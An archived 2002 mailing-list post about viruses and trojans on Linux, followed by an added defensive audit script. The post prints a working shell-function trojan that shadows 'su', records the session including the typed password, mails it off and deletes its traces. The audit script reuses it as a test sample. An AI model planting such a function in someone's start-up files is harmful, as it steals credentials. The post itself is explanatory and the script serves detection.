[H-GEN] Anti-Virus software for linux

Anthony Towns aj at azure.humbug.org.au
Mon Apr 22 11:55:56 EDT 2002


On Tue, Apr 23, 2002 at 01:18:44AM +1000, Nikolai Lusan wrote:
> hphillips at 4ward.com.au wrote:
> > I just came across this site ->
> > http://www.avp.ru/products.html?tgroup=4&pgroup=11 amongst the text
> > on that page is 'new viruses _for_ Linux appear every day'.
> > Are there any viruses for linux? If so how many? Surely they don't
> > appear every day!
> By the nature of the permission based systems that bless the *nix world 
> virii are not like they are in windows world. 

Of course, what you *do* get are lots of automated attacks against
services that might have known buffer overflows...

If you want to spin this, you could say something like "While Linux
systems do not suffer from the email viruses that have plagued Windows
systems recently, they nevertheless can suffer from a number of malicious
attacks launched over the Internet." and go on to explain about "buffer
overflow" attacks, and how to manage your risk (by avoiding running
services that you don't need, by keeping up to date with vendor security
updates and using a vendor who does good updates, by setting up monitoring
data, by validating your system regularly in a variety of ways).

Having an up-front approach to ensuring your software doesn't
do things you (the user) don't intend it to do [0] is a much better
approach to security than having after/during-the-fact checking with a
virus scanner.

If you want something that fits into the same niche as a virus checker
but on Linux, you should probably be looking for some scripts that detect
various sorts of r00tkits.

> > I am writing a basic sales brochure for small business to implement
> > linux solutions and was asked about viruses on linux. Every other
> > site I have been to has virus scanners that check the mail passing
> > through and/or the files stored on the box, no other site has even
> > mentioned viruses FOR linux.
> Given the things being touted as virii these days (worms like code red 
> and nimda[1] and the plethora of outlook based mail worms) a lot of 
> people would call what is, in actual fact, a trojan "a virus". 

Well, thanks to the Internet, viruses have been basically competed to
extinction by worms. Not much point infecting a boot sector or a file
and waiting to be transmitted when you can just get out there and do
it yourself.

> This is 
> not true, for a trojan to get onto a *nix system the superuser has to do 
> something bad 

What you say isn't true either, though. Trojans are really easy: all
you need to do is something like,

	# Sourced from the victim's own start-up file (~/.bashrc, ~/.profile),
	# a shell function named "su" is found before /bin/su, so every "su"
	# typed at that user's shell runs this instead:
	su () {
		# wrapper that runs the real su with the arguments the user typed
		(echo '#!/bin/sh'; echo /bin/su "$@") >.hax0r1
		chmod 755 .hax0r1
		# script(1) starts $SHELL (the wrapper) under a pty and records
		# everything written to the terminal during the session in .hax0r2
		SHELL=`pwd`/.hax0r1 script -q .hax0r2
		# mail the transcript off, then remove the evidence
		mail -s MUAHAHAHAHAHA root@localhost <.hax0r2
		rm -f .hax0r1 .hax0r2
	}

to trojan su with reasonable effectiveness, e.g., depending on your
purposes. I'd personally consider someone trojaning, say, mutt in a manner
similar to the above and capturing all the mail I send or read to be a
reasonably severe security violation.

> [4] any finding grammar, spelling or typing errors needs to run this
      ^^^
>     post through a de-robify script ;)

ITYM "anyone". HTH. HAND.

Cheers,
aj

[0] Permissions (programs acting as "aj" can do some things, programs
    acting as "mail" can do others, programs acting as "root" can do
    other things -- capability systems are even better, of course);
    source availability; catering to the expert rather than the novice
    (and thus expecting the user to direct the program, not vice-versa)
    and bunches of other things can be made to fit under that heading,
    and can be much more effective than virus-checking and similar things.
    Of course, it can be nice to have both...

-- 
Anthony Towns <aj at humbug.org.au> <http://azure.humbug.org.au/~aj/>
I don't speak for anyone save myself. GPG signed mail preferred.

     ``BAM! Science triumphs again!'' 
                    -- http://www.angryflower.com/vegeta.gif
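An added example, not part of aj's post: the rootkit-detection-style check a practitioner would want against the su() trojan shown above. A function or alias in a start-up file shadows a real binary without touching anything on disk that a file-integrity checker would notice, so the audit below does two things: it greps the usual per-user start-up files for function or alias definitions named after password-taking commands, and it asks the live shell whether those commands still resolve to a path. The list of sensitive commands, the list of start-up files, and the sample .bashrc (constructed here from the trojan in the post, never executed) are all assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the original post): audit for shell-function and
# alias trojans that shadow sensitive commands, as the su() function in the
# post shadows /bin/su.  Command list and file list are assumptions.

SENSITIVE_CMDS="su sudo ssh passwd gpg mutt"

# shadow_defs FILE
#   Print every line of FILE that defines a function or alias named after a
#   sensitive command.  Returns 0 if at least one was found, 1 otherwise.
shadow_defs() {
    _file=$1
    _hit=1
    for _c in $SENSITIVE_CMDS; do
        # matches:  su () {   su() {   function su   alias su=...
        if grep -nE "^[[:space:]]*(${_c}[[:space:]]*\(\)|function[[:space:]]+${_c}([[:space:]]|\(|$)|alias[[:space:]]+${_c}=)" "$_file"; then
            _hit=0
        fi
    done
    return $_hit
}

# is_real_binary NAME
#   Returns 0 if NAME resolves to a file on disk in the current shell, 1 if a
#   function, alias or builtin has taken it over (or it is missing).
#   command -v prints a path for executables and a bare name for functions.
is_real_binary() {
    case "$(command -v "$1" 2>/dev/null)" in
        /*) return 0 ;;
        *)  return 1 ;;
    esac
}

# scan_startup_files DIR
#   Run shadow_defs over the usual per-user start-up files under DIR
#   (assumed list).  Returns 0 if any shadowing definition was found.
scan_startup_files() {
    _dir=${1:-$HOME}
    _any=1
    for _f in .profile .bashrc .bash_profile .bash_aliases .zshrc .zshenv; do
        [ -f "$_dir/$_f" ] || continue
        if shadow_defs "$_dir/$_f"; then
            _any=0
        fi
    done
    return $_any
}

# demo_rc
#   Write a constructed .bashrc into a fresh temp dir: an innocent alias plus
#   the su() trojan from the post (as text only; it is never run).  Prints
#   the directory so callers can scan and then remove it.
demo_rc() {
    _d=$(mktemp -d)
    cat >"$_d/.bashrc" <<'EOF'
alias ls='ls --color=auto'
su () {
	(echo '#!/bin/sh'; echo /bin/su "$@") >.hax0r1
	chmod 755 .hax0r1
	SHELL=`pwd`/.hax0r1 script -q .hax0r2
	mail -s MUAHAHAHAHAHA root@localhost <.hax0r2
	rm -f .hax0r1 .hax0r2
}
EOF
    printf '%s\n' "$_d"
}

# Stand-alone run: check the live shell, the real home directory, and the
# constructed sample.
main() {
    for _c in $SENSITIVE_CMDS; do
        is_real_binary "$_c" && continue
        echo "WARNING: $_c does not resolve to a binary in this shell"
    done
    scan_startup_files "$HOME" || echo "no shadowing definitions under $HOME"
    _d=$(demo_rc)
    echo "constructed sample $_d/.bashrc:"
    shadow_defs "$_d/.bashrc"
    rm -rf "$_d"
}
main
```

Running it on the sample flags line 2, `su () {`, and nothing else; the alias for ls is left alone because only the names in SENSITIVE_CMDS are matched. The live-shell check is the part worth keeping in a login script: `command -v su` printing `su` instead of `/bin/su` means something in the environment has already interposed itself.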